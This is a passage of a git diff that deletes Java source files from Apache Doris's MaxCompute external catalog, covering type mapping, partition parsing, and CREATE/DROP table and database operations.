org.apache.doris.thrift.TTableDescriptor; -import org.apache.doris.thrift.TTableType; - -import com.aliyun.odps.OdpsType; -import com.aliyun.odps.Table; -import com.aliyun.odps.table.TableIdentifier; -import com.aliyun.odps.type.ArrayTypeInfo; -import com.aliyun.odps.type.CharTypeInfo; -import com.aliyun.odps.type.DecimalTypeInfo; -import com.aliyun.odps.type.MapTypeInfo; -import com.aliyun.odps.type.StructTypeInfo; -import com.aliyun.odps.type.TypeInfo; -import com.aliyun.odps.type.VarcharTypeInfo; -import com.google.common.collect.ImmutableList; -import com.google.common.collect.Lists; -import com.google.common.collect.Maps; - -import java.util.ArrayList; -import java.util.Collections; -import java.util.HashMap; -import java.util.List; -import java.util.Map; -import java.util.Map.Entry; -import java.util.Objects; -import java.util.Optional; -import java.util.stream.Collectors; - -/** - * MaxCompute external table. - */ -public class MaxComputeExternalTable extends ExternalTable { - public MaxComputeExternalTable(long id, String name, String remoteName, MaxComputeExternalCatalog catalog, - MaxComputeExternalDatabase db) { - super(id, name, remoteName, catalog, db, TableType.MAX_COMPUTE_EXTERNAL_TABLE); - } - - @Override - public String getMetaCacheEngine() { - return MaxComputeExternalMetaCache.ENGINE; - } - - @Override - protected synchronized void makeSureInitialized() { - super.makeSureInitialized(); - if (!objectCreated) { - objectCreated = true; - } - } - - @Override - public boolean supportInternalPartitionPruned() { - return true; - } - - @Override - public List getPartitionColumns(Optional snapshot) { - return getPartitionColumns(); - } - - public List getPartitionColumns() { - makeSureInitialized(); - Optional schemaCacheValue = getSchemaCacheValue(); - return schemaCacheValue.map(value -> ((MaxComputeSchemaCacheValue) value).getPartitionColumns()) - .orElse(Collections.emptyList()); - } - - @Override - public Map getNameToPartitionItems(Optional snapshot) { - if (getPartitionColumns().isEmpty()) { - return Collections.emptyMap(); - } - - TablePartitionValues tablePartitionValues = getPartitionValues(); - Map idToPartitionItem = tablePartitionValues.getIdToPartitionItem(); - Map idToNameMap = tablePartitionValues.getPartitionIdToNameMap(); - - Map nameToPartitionItem = Maps.newHashMapWithExpectedSize(idToPartitionItem.size()); - for (Entry entry : idToPartitionItem.entrySet()) { - nameToPartitionItem.put(idToNameMap.get(entry.getKey()), entry.getValue()); - } - return nameToPartitionItem; - } - - private TablePartitionValues getPartitionValues() { - makeSureInitialized(); - Optional schemaCacheValue = getSchemaCacheValue(); - if (!schemaCacheValue.isPresent()) { - return new TablePartitionValues(); - } - MaxComputeExternalMetaCache metadataCache = Env.getCurrentEnv().getExtMetaCacheMgr() - .maxCompute(getCatalog().getId()); - return metadataCache.getPartitionValues(getOrBuildNameMapping()); - } - - /** - * parse all values from partitionPath to a single list. - * In MaxCompute : Support special characters : _$#.!@ - * Ref : MaxCompute Error Code: ODPS-0130071 Invalid partition value. - * - * @param partitionColumns partitionColumns can contain the part1,part2,part3... - * @param partitionPath partitionPath format is like the 'part1=123/part2=abc/part3=1bc' - * @return all values of partitionPath - */ - static List parsePartitionValues(List partitionColumns, String partitionPath) { - String[] partitionFragments = partitionPath.split("/"); - if (partitionFragments.length != partitionColumns.size()) { - throw new RuntimeException("Failed to parse partition values of path: " + partitionPath); - } - List partitionValues = new ArrayList<>(partitionFragments.length); - for (int i = 0; i < partitionFragments.length; i++) { - String prefix = partitionColumns.get(i) + "="; - if (partitionFragments[i].startsWith(prefix)) { - partitionValues.add(partitionFragments[i].substring(prefix.length())); - } else { - partitionValues.add(partitionFragments[i]); - } - } - return partitionValues; - } - - public Map getColumnNameToOdpsColumn() { - makeSureInitialized(); - Optional schemaCacheValue = getSchemaCacheValue(); - return schemaCacheValue.map(value -> ((MaxComputeSchemaCacheValue) value).getColumnNameToOdpsColumn()) - .orElse(Collections.emptyMap()); - } - - @Override - public Optional initSchema() { - // this method will be called at semantic parsing. - makeSureInitialized(); - MaxComputeExternalCatalog mcCatalog = (MaxComputeExternalCatalog) catalog; - - Table odpsTable = mcCatalog.getOdpsTable(dbName, name); - TableIdentifier tableIdentifier = mcCatalog.getOdpsTableIdentifier(dbName, name); - - List columns = odpsTable.getSchema().getColumns(); - Map columnNameToOdpsColumn = new HashMap<>(); - for (com.aliyun.odps.Column column : columns) { - columnNameToOdpsColumn.put(column.getName(), column); - } - - List schema = Lists.newArrayListWithCapacity(columns.size()); - for (com.aliyun.odps.Column field : columns) { - schema.add(new Column(field.getName(), mcTypeToDorisType(field.getTypeInfo()), true, null, - field.isNullable(), field.getComment(), true, -1)); - } - - List partitionColumns = odpsTable.getSchema().getPartitionColumns(); - List partitionColumnNames = new ArrayList<>(partitionColumns.size()); - List partitionTypes = new ArrayList<>(partitionColumns.size()); - - // sort partition columns to align partitionTypes and partitionName. - List partitionDorisColumns = new ArrayList<>(); - for (com.aliyun.odps.Column partColumn : partitionColumns) { - Type partitionType = mcTypeToDorisType(partColumn.getTypeInfo()); - Column dorisCol = new Column(partColumn.getName(), partitionType, true, null, - true, partColumn.getComment(), true, -1); - - columnNameToOdpsColumn.put(partColumn.getName(), partColumn); - partitionColumnNames.add(partColumn.getName()); - partitionDorisColumns.add(dorisCol); - partitionTypes.add(partitionType); - schema.add(dorisCol); - } - - List partitionSpecs; - if (!partitionColumns.isEmpty()) { - partitionSpecs = odpsTable.getPartitions().stream() - .map(e -> e.getPartitionSpec().toString(false, true)) - .collect(Collectors.toList()); - } else { - partitionSpecs = ImmutableList.of(); - } - - return Optional.of(new MaxComputeSchemaCacheValue(schema, odpsTable, tableIdentifier, - partitionColumnNames, partitionSpecs, partitionDorisColumns, partitionTypes, columnNameToOdpsColumn)); - } - - private Type mcTypeToDorisType(TypeInfo typeInfo) { - OdpsType odpsType = typeInfo.getOdpsType(); - switch (odpsType) { - case VOID: { - return Type.NULL; - } - case BOOLEAN: { - return Type.BOOLEAN; - } - case TINYINT: { - return Type.TINYINT; - } - case SMALLINT: { - return Type.SMALLINT; - } - case INT: { - return Type.INT; - } - case BIGINT: { - return Type.BIGINT; - } - case CHAR: { - CharTypeInfo charType = (CharTypeInfo) typeInfo; - return ScalarType.createChar(charType.getLength()); - } - case STRING: { - return ScalarType.createStringType(); - } - case VARCHAR: { - VarcharTypeInfo varcharType = (VarcharTypeInfo) typeInfo; - return ScalarType.createVarchar(varcharType.getLength()); - } - case JSON: { - return Type.UNSUPPORTED; - // return Type.JSONB; - } - case FLOAT: { - return Type.FLOAT; - } - case DOUBLE: { - return Type.DOUBLE; - } - case DECIMAL: { - DecimalTypeInfo decimal = (DecimalTypeInfo) typeInfo; - return ScalarType.createDecimalV3Type(decimal.getPrecision(), decimal.getScale()); - } - case DATE: { - return ScalarType.createDateV2Type(); - } - case DATETIME: { - return ScalarType.createDatetimeV2Type(3); - } - case TIMESTAMP: - case TIMESTAMP_NTZ: { - return ScalarType.createDatetimeV2Type(6); - } - case ARRAY: { - ArrayTypeInfo arrayType = (ArrayTypeInfo) typeInfo; - Type innerType = mcTypeToDorisType(arrayType.getElementTypeInfo()); - return ArrayType.create(innerType, true); - } - case MAP: { - MapTypeInfo mapType = (MapTypeInfo) typeInfo; - return new MapType(mcTypeToDorisType(mapType.getKeyTypeInfo()), - mcTypeToDorisType(mapType.getValueTypeInfo())); - } - case STRUCT: { - ArrayList fields = new ArrayList<>(); - StructTypeInfo structType = (StructTypeInfo) typeInfo; - List fieldNames = structType.getFieldNames(); - List fieldTypeInfos = structType.getFieldTypeInfos(); - for (int i = 0; i < structType.getFieldCount(); i++) { - Type innerType = mcTypeToDorisType(fieldTypeInfos.get(i)); - fields.add(new StructField(fieldNames.get(i), innerType)); - } - return new StructType(fields); - } - case BINARY: - case INTERVAL_DAY_TIME: - case INTERVAL_YEAR_MONTH: - return Type.UNSUPPORTED; - default: - throw new IllegalArgumentException("Cannot transform unknown type: " + odpsType); - } - } - - public TableIdentifier getTableIdentifier() { - makeSureInitialized(); - Optional schemaCacheValue = getSchemaCacheValue(); - return schemaCacheValue.map(value -> ((MaxComputeSchemaCacheValue) value).getTableIdentifier()) - .orElse(null); - } - - @Override - public TTableDescriptor toThrift() { - // ak sk endpoint project quota - List schema = getFullSchema(); - TMCTable tMcTable = new TMCTable(); - MaxComputeExternalCatalog mcCatalog = ((MaxComputeExternalCatalog) catalog); - - tMcTable.setProperties(mcCatalog.getProperties()); - tMcTable.setEndpoint(mcCatalog.getEndpoint()); - // use mc project as dbName - tMcTable.setProject(dbName); - tMcTable.setQuota(mcCatalog.getQuota()); - tMcTable.setTable(name); - TTableDescriptor tTableDescriptor = new TTableDescriptor(getId(), TTableType.MAX_COMPUTE_TABLE, - schema.size(), 0, getName(), dbName); - tTableDescriptor.setMcTable(tMcTable); - return tTableDescriptor; - } - - public Table getOdpsTable() { - makeSureInitialized(); - Optional schemaCacheValue = getSchemaCacheValue(); - return schemaCacheValue.map(value -> ((MaxComputeSchemaCacheValue) value).getOdpsTable()) - .orElse(null); - } - - public boolean isUnsupportedOdpsTable() { - Table odpsTable = getOdpsTable(); - return isUnsupportedOdpsTable(odpsTable); - } - - public static boolean isUnsupportedOdpsTable(Table odpsTable) { - Objects.requireNonNull(odpsTable, "MaxCompute table metadata is not initialized"); - return odpsTable.isExternalTable() || odpsTable.isVirtualView(); - } - - @Override - public boolean isPartitionedTable() { - makeSureInitialized(); - return getOdpsTable().isPartitioned(); - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java deleted file mode 100644 index f9bda6936c9a40..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java +++ /dev/null @@ -1,565 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.maxcompute; - -import org.apache.doris.analysis.DistributionDesc; -import org.apache.doris.analysis.Expr; -import org.apache.doris.analysis.ExprToSqlVisitor; -import org.apache.doris.analysis.FunctionCallExpr; -import org.apache.doris.analysis.HashDistributionDesc; -import org.apache.doris.analysis.PartitionDesc; -import org.apache.doris.analysis.SlotRef; -import org.apache.doris.analysis.ToSqlParams; -import org.apache.doris.catalog.ArrayType; -import org.apache.doris.catalog.Column; -import org.apache.doris.catalog.MapType; -import org.apache.doris.catalog.PrimitiveType; -import org.apache.doris.catalog.ScalarType; -import org.apache.doris.catalog.StructField; -import org.apache.doris.catalog.StructType; -import org.apache.doris.catalog.Type; -import org.apache.doris.catalog.info.CreateOrReplaceBranchInfo; -import org.apache.doris.catalog.info.CreateOrReplaceTagInfo; -import org.apache.doris.catalog.info.DropBranchInfo; -import org.apache.doris.catalog.info.DropTagInfo; -import org.apache.doris.common.DdlException; -import org.apache.doris.common.ErrorCode; -import org.apache.doris.common.ErrorReport; -import org.apache.doris.common.UserException; -import org.apache.doris.datasource.ExternalDatabase; -import org.apache.doris.datasource.ExternalTable; -import org.apache.doris.datasource.operations.ExternalMetadataOps; -import org.apache.doris.nereids.trees.plans.commands.info.CreateTableInfo; - -import com.aliyun.odps.Odps; -import com.aliyun.odps.OdpsException; -import com.aliyun.odps.TableSchema; -import com.aliyun.odps.Tables; -import com.aliyun.odps.type.TypeInfo; -import com.aliyun.odps.type.TypeInfoFactory; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -import java.util.ArrayList; -import java.util.HashMap; -import java.util.HashSet; -import java.util.List; -import java.util.Map; -import java.util.Optional; -import java.util.Set; - -/** - * MaxCompute metadata operations for DDL support (CREATE TABLE, etc.) - */ -public class MaxComputeMetadataOps implements ExternalMetadataOps { - private static final Logger LOG = LogManager.getLogger(MaxComputeMetadataOps.class); - - private static final long MAX_LIFECYCLE_DAYS = 37231; - private static final int MAX_BUCKET_NUM = 1024; - - private final MaxComputeExternalCatalog dorisCatalog; - private final Odps odps; - - public MaxComputeMetadataOps(MaxComputeExternalCatalog dorisCatalog, Odps odps) { - this.dorisCatalog = dorisCatalog; - this.odps = odps; - } - - @Override - public void close() { - } - - @Override - public boolean tableExist(String dbName, String tblName) { - return dorisCatalog.tableExist(null, dbName, tblName); - } - - @Override - public boolean databaseExist(String dbName) { - return dorisCatalog.getMcStructureHelper().databaseExist(dorisCatalog.getClient(), dbName); - } - - @Override - public List listDatabaseNames() { - return dorisCatalog.listDatabaseNames(); - } - - @Override - public List listTableNames(String dbName) { - return dorisCatalog.listTableNames(null, dbName); - } - - // ==================== Create/Drop Database ==================== - - @Override - public boolean createDbImpl(String dbName, boolean ifNotExists, Map properties) - throws DdlException { - ExternalDatabase dorisDb = dorisCatalog.getDbNullable(dbName); - boolean exists = databaseExist(dbName); - if (dorisDb != null || exists) { - if (ifNotExists) { - LOG.info("create database[{}] which already exists", dbName); - return true; - } else { - ErrorReport.reportDdlException(ErrorCode.ERR_DB_CREATE_EXISTS, dbName); - } - } - dorisCatalog.getMcStructureHelper().createDb(odps, dbName, ifNotExists); - return false; - } - - @Override - public void afterCreateDb() { - dorisCatalog.resetMetaCacheNames(); - } - - @Override - public void dropDbImpl(String dbName, boolean ifExists, boolean force) throws DdlException { - ExternalDatabase dorisDb = dorisCatalog.getDbNullable(dbName); - if (dorisDb == null) { - if (ifExists) { - LOG.info("drop database[{}] which does not exist", dbName); - return; - } else { - ErrorReport.reportDdlException(ErrorCode.ERR_DB_DROP_EXISTS, dbName); - } - } - if (force) { - List remoteTableNames = listTableNames(dorisDb.getRemoteName()); - for (String remoteTableName : remoteTableNames) { - ExternalTable tbl = null; - try { - tbl = (ExternalTable) dorisDb.getTableOrDdlException(remoteTableName); - } catch (DdlException e) { - LOG.warn("failed to get table when force drop database [{}], table[{}], error: {}", - dbName, remoteTableName, e.getMessage()); - continue; - } - dropTableImpl(tbl, true); - } - } - dorisCatalog.getMcStructureHelper().dropDb(odps, dbName, ifExists); - } - - @Override - public void afterDropDb(String dbName) { - dorisCatalog.unregisterDatabase(dbName); - } - - // ==================== Create Table ==================== - - @Override - public boolean createTableImpl(CreateTableInfo createTableInfo) throws UserException { - String dbName = createTableInfo.getDbName(); - String tableName = createTableInfo.getTableName(); - - // 1. Validate database existence - ExternalDatabase db = dorisCatalog.getDbNullable(dbName); - if (db == null) { - throw new UserException( - "Failed to get database: '" + dbName + "' in catalog: " + dorisCatalog.getName()); - } - - // 2. Check if table exists in remote - if (tableExist(db.getRemoteName(), tableName)) { - if (createTableInfo.isIfNotExists()) { - LOG.info("create table[{}] which already exists", tableName); - return true; - } else { - ErrorReport.reportDdlException(ErrorCode.ERR_TABLE_EXISTS_ERROR, tableName); - } - } - - // 3. Check if table exists in local (case sensitivity issue) - ExternalTable dorisTable = db.getTableNullable(tableName); - if (dorisTable != null) { - if (createTableInfo.isIfNotExists()) { - LOG.info("create table[{}] which already exists", tableName); - return true; - } else { - ErrorReport.reportDdlException(ErrorCode.ERR_TABLE_EXISTS_ERROR, tableName); - } - } - - // 4. Validate columns - List columns = createTableInfo.getColumns(); - validateColumns(columns); - - // 5. Validate partition description - PartitionDesc partitionDesc = createTableInfo.getPartitionDesc(); - validatePartitionDesc(partitionDesc); - - // 6. Build MaxCompute TableSchema - TableSchema schema = buildMaxComputeTableSchema(columns, partitionDesc); - - // 7. Extract properties - Map properties = createTableInfo.getProperties(); - Long lifecycle = extractLifecycle(properties); - Map mcProperties = extractMaxComputeProperties(properties); - Integer bucketNum = extractBucketNum(createTableInfo); - - // 8. Create table via MaxCompute SDK - McStructureHelper structureHelper = dorisCatalog.getMcStructureHelper(); - Tables.TableCreator creator = structureHelper.createTableCreator( - odps, db.getRemoteName(), tableName, schema); - - if (createTableInfo.isIfNotExists()) { - creator.ifNotExists(); - } - - String comment = createTableInfo.getComment(); - if (comment != null && !comment.isEmpty()) { - creator.withComment(comment); - } - - if (lifecycle != null) { - creator.withLifeCycle(lifecycle); - } - - if (!mcProperties.isEmpty()) { - creator.withTblProperties(mcProperties); - } - - if (bucketNum != null) { - creator.withDeltaTableBucketNum(bucketNum); - } - - try { - creator.create(); - } catch (OdpsException e) { - throw new DdlException("Failed to create MaxCompute table '" + tableName + "': " + e.getMessage(), e); - } - - return false; - } - - @Override - public void afterCreateTable(String dbName, String tblName) { - Optional> db = dorisCatalog.getDbForReplay(dbName); - if (db.isPresent()) { - db.get().resetMetaCacheNames(); - } - LOG.info("after create table {}.{}.{}, is db exists: {}", - dorisCatalog.getName(), dbName, tblName, db.isPresent()); - } - - // ==================== Drop Table (not supported yet) ==================== - - @Override - public void dropTableImpl(ExternalTable dorisTable, boolean ifExists) throws DdlException { - // Get remote names (handles case-sensitivity) - String remoteDbName = dorisTable.getRemoteDbName(); - String remoteTblName = dorisTable.getRemoteName(); - - // Check table existence - if (!tableExist(remoteDbName, remoteTblName)) { - if (ifExists) { - LOG.info("drop table[{}.{}] which does not exist", remoteDbName, remoteTblName); - return; - } else { - ErrorReport.reportDdlException(ErrorCode.ERR_UNKNOWN_TABLE, - remoteTblName, remoteDbName); - } - } - - // Drop table via McStructureHelper - try { - McStructureHelper structureHelper = dorisCatalog.getMcStructureHelper(); - structureHelper.dropTable(odps, remoteDbName, remoteTblName, ifExists); - LOG.info("Successfully dropped MaxCompute table: {}.{}", remoteDbName, remoteTblName); - } catch (OdpsException e) { - throw new DdlException("Failed to drop MaxCompute table '" - + remoteTblName + "': " + e.getMessage(), e); - } - } - - @Override - public void afterDropTable(String dbName, String tblName) { - Optional> db = dorisCatalog.getDbForReplay(dbName); - if (db.isPresent()) { - db.get().unregisterTable(tblName); - } - LOG.info("after drop table {}.{}.{}, is db exists: {}", - dorisCatalog.getName(), dbName, tblName, db.isPresent()); - } - - @Override - public void truncateTableImpl(ExternalTable dorisTable, List partitions) throws DdlException { - throw new DdlException("Truncate table is not supported for MaxCompute catalog."); - } - - // ==================== Branch/Tag (not supported) ==================== - - @Override - public void createOrReplaceBranchImpl(ExternalTable dorisTable, CreateOrReplaceBranchInfo branchInfo) - throws UserException { - throw new UserException("Branch operations are not supported for MaxCompute catalog."); - } - - @Override - public void createOrReplaceTagImpl(ExternalTable dorisTable, CreateOrReplaceTagInfo tagInfo) - throws UserException { - throw new UserException("Tag operations are not supported for MaxCompute catalog."); - } - - @Override - public void dropTagImpl(ExternalTable dorisTable, DropTagInfo tagInfo) throws UserException { - throw new UserException("Tag operations are not supported for MaxCompute catalog."); - } - - @Override - public void dropBranchImpl(ExternalTable dorisTable, DropBranchInfo branchInfo) throws UserException { - throw new UserException("Branch operations are not supported for MaxCompute catalog."); - } - - // ==================== Type Conversion ==================== - - /** - * Convert Doris type to MaxCompute TypeInfo. - */ - public static TypeInfo dorisTypeToMcType(Type dorisType) throws UserException { - if (dorisType.isScalarType()) { - return dorisScalarTypeToMcType(dorisType); - } else if (dorisType.isArrayType()) { - ArrayType arrayType = (ArrayType) dorisType; - TypeInfo elementType = dorisTypeToMcType(arrayType.getItemType()); - return TypeInfoFactory.getArrayTypeInfo(elementType); - } else if (dorisType.isMapType()) { - MapType mapType = (MapType) dorisType; - TypeInfo keyType = dorisTypeToMcType(mapType.getKeyType()); - TypeInfo valueType = dorisTypeToMcType(mapType.getValueType()); - return TypeInfoFactory.getMapTypeInfo(keyType, valueType); - } else if (dorisType.isStructType()) { - StructType structType = (StructType) dorisType; - List fields = structType.getFields(); - List fieldNames = new ArrayList<>(fields.size()); - List fieldTypes = new ArrayList<>(fields.size()); - for (StructField field : fields) { - fieldNames.add(field.getName()); - fieldTypes.add(dorisTypeToMcType(field.getType())); - } - return TypeInfoFactory.getStructTypeInfo(fieldNames, fieldTypes); - } else { - throw new UserException("Unsupported Doris type for MaxCompute: " + dorisType); - } - } - - private static TypeInfo dorisScalarTypeToMcType(Type dorisType) throws UserException { - PrimitiveType primitiveType = dorisType.getPrimitiveType(); - switch (primitiveType) { - case BOOLEAN: - return TypeInfoFactory.BOOLEAN; - case TINYINT: - return TypeInfoFactory.TINYINT; - case SMALLINT: - return TypeInfoFactory.SMALLINT; - case INT: - return TypeInfoFactory.INT; - case BIGINT: - return TypeInfoFactory.BIGINT; - case FLOAT: - return TypeInfoFactory.FLOAT; - case DOUBLE: - return TypeInfoFactory.DOUBLE; - case CHAR: - return TypeInfoFactory.getCharTypeInfo(((ScalarType) dorisType).getLength()); - case VARCHAR: - return TypeInfoFactory.getVarcharTypeInfo(((ScalarType) dorisType).getLength()); - case STRING: - return TypeInfoFactory.STRING; - case DECIMALV2: - case DECIMAL32: - case DECIMAL64: - case DECIMAL128: - case DECIMAL256: - return TypeInfoFactory.getDecimalTypeInfo( - ((ScalarType) dorisType).getScalarPrecision(), - ((ScalarType) dorisType).getScalarScale()); - case DATE: - case DATEV2: - return TypeInfoFactory.DATE; - case DATETIME: - case DATETIMEV2: - return TypeInfoFactory.DATETIME; - case LARGEINT: - case HLL: - case BITMAP: - case QUANTILE_STATE: - case AGG_STATE: - case JSONB: - case VARIANT: - case IPV4: - case IPV6: - default: - throw new UserException( - "Unsupported Doris type for MaxCompute: " + primitiveType); - } - } - - // ==================== Validation ==================== - - private void validateColumns(List columns) throws UserException { - if (columns == null || columns.isEmpty()) { - throw new UserException("Table must have at least one column."); - } - Set columnNames = new HashSet<>(); - for (Column col : columns) { - if (col.isAutoInc()) { - throw new UserException( - "Auto-increment columns are not supported for MaxCompute tables: " + col.getName()); - } - if (col.isAggregated()) { - throw new UserException( - "Aggregation columns are not supported for MaxCompute tables: " + col.getName()); - } - String lowerName = col.getName().toLowerCase(); - if (!columnNames.add(lowerName)) { - throw new UserException("Duplicate column name: " + col.getName()); - } - // Validate that the type is convertible - dorisTypeToMcType(col.getType()); - } - } - - private void validatePartitionDesc(PartitionDesc partitionDesc) throws UserException { - if (partitionDesc == null) { - return; - } - ArrayList exprs = partitionDesc.getPartitionExprs(); - if (exprs == null || exprs.isEmpty()) { - return; - } - for (Expr expr : exprs) { - if (expr instanceof SlotRef) { - // Identity partition - OK - } else if (expr instanceof FunctionCallExpr) { - String funcName = ((FunctionCallExpr) expr).getFnName().getFunction(); - throw new UserException( - "MaxCompute does not support partition transform '" + funcName - + "'. Only identity partitions are supported."); - } else { - throw new UserException("Invalid partition expression: " - + expr.accept(ExprToSqlVisitor.INSTANCE, ToSqlParams.WITH_TABLE)); - } - } - } - - // ==================== Schema Building ==================== - - private TableSchema buildMaxComputeTableSchema(List columns, PartitionDesc partitionDesc) - throws UserException { - Set partitionColNames = new HashSet<>(); - if (partitionDesc != null && partitionDesc.getPartitionColNames() != null) { - for (String name : partitionDesc.getPartitionColNames()) { - partitionColNames.add(name.toLowerCase()); - } - } - - TableSchema schema = new TableSchema(); - - // Add regular columns (non-partition) - for (Column col : columns) { - if (!partitionColNames.contains(col.getName().toLowerCase())) { - TypeInfo mcType = dorisTypeToMcType(col.getType()); - com.aliyun.odps.Column mcCol = new com.aliyun.odps.Column( - col.getName(), mcType, col.getComment()); - schema.addColumn(mcCol); - } - } - - // Add partition columns in the order specified by partitionDesc - if (partitionDesc != null && partitionDesc.getPartitionColNames() != null) { - for (String partColName : partitionDesc.getPartitionColNames()) { - Column col = findColumnByName(columns, partColName); - if (col == null) { - throw new UserException("Partition column '" + partColName + "' not found in column definitions."); - } - TypeInfo mcType = dorisTypeToMcType(col.getType()); - com.aliyun.odps.Column mcCol = new com.aliyun.odps.Column( - col.getName(), mcType, col.getComment()); - schema.addPartitionColumn(mcCol); - } - } - - return schema; - } - - private Column findColumnByName(List columns, String name) { - for (Column col : columns) { - if (col.getName().equalsIgnoreCase(name)) { - return col; - } - } - return null; - } - - // ==================== Property Extraction ==================== - - private Long extractLifecycle(Map properties) throws UserException { - String lifecycleStr = properties.get("mc.lifecycle"); - if (lifecycleStr == null) { - lifecycleStr = properties.get("lifecycle"); - } - if (lifecycleStr != null) { - try { - long lifecycle = Long.parseLong(lifecycleStr); - if (lifecycle <= 0 || lifecycle > MAX_LIFECYCLE_DAYS) { - throw new UserException( - "Invalid lifecycle value: " + lifecycle - + ". Must be between 1 and " + MAX_LIFECYCLE_DAYS + "."); - } - return lifecycle; - } catch (NumberFormatException e) { - throw new UserException("Invalid lifecycle value: '" + lifecycleStr + "'. Must be a positive integer."); - } - } - return null; - } - - private Map extractMaxComputeProperties(Map properties) { - Map mcProperties = new HashMap<>(); - for (Map.Entry entry : properties.entrySet()) { - if (entry.getKey().startsWith("mc.tblproperty.")) { - String mcKey = entry.getKey().substring("mc.tblproperty.".length()); - mcProperties.put(mcKey, entry.getValue()); - } - } - return mcProperties; - } - - private Integer extractBucketNum(CreateTableInfo createTableInfo) throws UserException { - DistributionDesc distributionDesc = createTableInfo.getDistributionDesc(); - if (distributionDesc == null) { - return null; - } - if (!(distributionDesc instanceof HashDistributionDesc)) { - throw new UserException( - "MaxCompute only supports hash distribution. Got: " + distributionDesc.getClass().getSimpleName()); - } - - HashDistributionDesc hashDist = (HashDistributionDesc) distributionDesc; - int bucketNum = hashDist.getBuckets(); - - if (bucketNum <= 0 || bucketNum > MAX_BUCKET_NUM) { - throw new UserException( - "Invalid bucket number: " + bucketNum + ". Must be between 1 and " + MAX_BUCKET_NUM + "."); - } - - return bucketNum; - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeSchemaCacheValue.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeSchemaCacheValue.java deleted file mode 100644 index cd734985e6e92b..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeSchemaCacheValue.java +++ /dev/null @@ -1,67 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.maxcompute; - -import org.apache.doris.catalog.Column; -import org.apache.doris.catalog.Type; -import org.apache.doris.datasource.SchemaCacheValue; - -import com.aliyun.odps.Table; -import com.aliyun.odps.table.TableIdentifier; -import lombok.Getter; -import lombok.Setter; - -import java.util.List; -import java.util.Map; - -@Getter -@Setter -public class MaxComputeSchemaCacheValue extends SchemaCacheValue { - private Table odpsTable; - private TableIdentifier tableIdentifier; - private List partitionColumnNames; - private List partitionSpecs; - private List partitionColumns; - private List partitionTypes; - private Map columnNameToOdpsColumn; - - public MaxComputeSchemaCacheValue(List schema, Table odpsTable, TableIdentifier tableIdentifier, - List partitionColumnNames, List partitionSpecs, List partitionColumns, - List partitionTypes, Map columnNameToOdpsColumn) { - super(schema); - this.odpsTable = odpsTable; - this.tableIdentifier = tableIdentifier; - this.partitionSpecs = partitionSpecs; - this.partitionColumnNames = partitionColumnNames; - this.partitionColumns = partitionColumns; - this.partitionTypes = partitionTypes; - this.columnNameToOdpsColumn = columnNameToOdpsColumn; - } - - public List getPartitionColumns() { - return partitionColumns; - } - - public List getPartitionColumnNames() { - return partitionColumnNames; - } - - public Map getColumnNameToOdpsColumn() { - return columnNameToOdpsColumn; - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/McStructureHelper.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/McStructureHelper.java deleted file mode 100644 index 82fad60f3da014..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/McStructureHelper.java +++ /dev/null @@ -1,298 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.maxcompute; - - -import org.apache.doris.common.DdlException; - -import com.aliyun.odps.Odps; -import com.aliyun.odps.OdpsException; -import com.aliyun.odps.Partition; -import com.aliyun.odps.Project; -import com.aliyun.odps.Schema; -import com.aliyun.odps.Table; -import com.aliyun.odps.TableSchema; -import com.aliyun.odps.Tables; -import com.aliyun.odps.security.SecurityManager; -import com.aliyun.odps.table.TableIdentifier; -import com.aliyun.odps.utils.StringUtils; -import com.google.gson.JsonObject; -import com.google.gson.JsonParser; - -import java.util.ArrayList; -import java.util.Iterator; -import java.util.List; - - -/** - * Due to the introduction of the `mc.enable.namespace.schema` property, most interfaces using the - * ODPS client have changed, and the mapping structure between Doris and MaxCompute has also changed. - * Different property values correspond to different implementation class. - * It's important to note that when external functions are called through the interface, the structure - * mapped by Doris (database/table) is used, and the MaxCompute concept does not need to be considered. - */ -public interface McStructureHelper { - List listTableNames(Odps mcClient, String dbName); - - List listDatabaseNames(Odps mcClient, String defaultProject); - - boolean tableExist(Odps mcClient, String dbName, String tableName) throws RuntimeException; - - boolean databaseExist(Odps mcClient, String dbName); - - 